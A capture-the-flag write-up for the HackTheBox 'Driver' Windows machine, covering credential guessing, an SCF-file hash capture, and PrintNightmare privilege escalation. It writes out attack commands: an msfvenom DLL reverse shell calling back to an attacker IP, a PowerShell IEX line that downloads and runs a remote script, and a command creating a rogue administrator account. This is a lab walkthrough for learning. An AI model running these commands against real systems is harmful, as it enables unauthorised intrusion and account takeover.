Hello everyone, I will be sharing my writeup for HTB-Driver machine, which was an easy windows box, starting off with the nmap, we can see http, smb and winrm service running on the box , visiting the web server it asked for credentials which were easily guessable and allowed us to login which showed that we can upload printer firmware which was really a rabbit hole, uploading a scf file allowed us to capture a NTLMv2 hash of the user, and cracking it we were able to login through winrm on the machine. Being a machine about printer and this machine was released when PrintNightmare
(CVE-2021–34527) was found, so using the poc we got NT AUTHORITY\ SYSTEM on the machine.
NMAP
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=MFP Firmware Update Center. Please enter password for admin
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
445/tcp open microsoft-ds syn-ack ttl 127 Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: DRIVER; OS: Windows; CPE: cpe:/o:microsoft:windows
PORT 139/445 (SMB)
Checking smb share through anonymous login it seems we don’t have access it to it so let’s move on to web server
PORT 80 (HTTP)
On visiting web server , it’s going to ask credentials so let’s try admin;admin
to see if this works
And it did it ,so let’s see what we have here
It’s running on php , I checked to include index file with php
extension and this loaded the page so this page is written on php so just some basic enumeration here. There are only two pages here , the other page is about uploading a firmware for the printer
I tried uploading something but it doesn’t seem that I can access that file from anywhere so I ran gobuster
and it also didn't found anything interesting
Now I kept thinking but nothing was coming to my mind until I focused on these lines “ upload the respective firmware update to our file share” , so maybe the file we upload here is going to smb share , so here I learned a new attack which is known as SCF File attack Shell Command File
.
So we need to create a .scf
file , it will look like this
Now we will have to upload this file and at the same time run responder
to catch NTMLv2 hash
responder -I tun0 -rdw -v
Just copy any of the hash , they all are the same, the only different is the time difference (in seconds) and save the hash in a file , and crack it with hashcat
Now to verify if we have valid creds , we can use crackmapexec
to verify it on smb
We only have read access here so we can’t get a shell using smbexec
or psexec
. Since WinRM is open (port 5985) , we can check if we can get a shell with that
It’s showing us the status “pwned” meaning that we can get a shell
Privilege Escalation (Print Nightmare Python)
Assuming from the web page that there’s a print spooler service running , we can test if we can exploit PrintNightmare
, now this requires some setup as we need to clone the specific impacket repo
https://github.com/cube0x0/CVE-2021-1675
After cloning it we would then have to run python3 ./setup.py install
and copy the contents of CVE-2021-1675.py
, start the smb server using service smbd restart
and generate a dll reverse shell
msfvenom x64 -p windows/x64/shell_reverse_tcp LHOST=10.10.14.125 LPORT=2222 -f dll -o /var/smb/shell.dll
Make sure that you have made read access to other group for this file
Now to launch the script and catch the shell
Print Nightmare (Powershell)
We can achieve SYSTEM on this machine through powershell as well , without the need of setting up a smb server
So we’ll use this POC for the pring nightmare exploit
https://github.com/calebstewart/CVE-2021-1675
After transferring it to target machine , let’s import the ps1 file. But if we try to import the script , it’s going to show us an error “running scripts is disabled on this system”
So to bypass this , we need to download the file using IEX
IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.120/nightmare.ps1');
An advantage of downloading it this way is that not only it downloads the file but it will actually import the script so we don’t have to import it manually
Invoke-Nightmare -NewUser "USER" -NewPassword "PASS"
We can see that the user has been created
And we can then just switch to this user by logging in with evil-winrm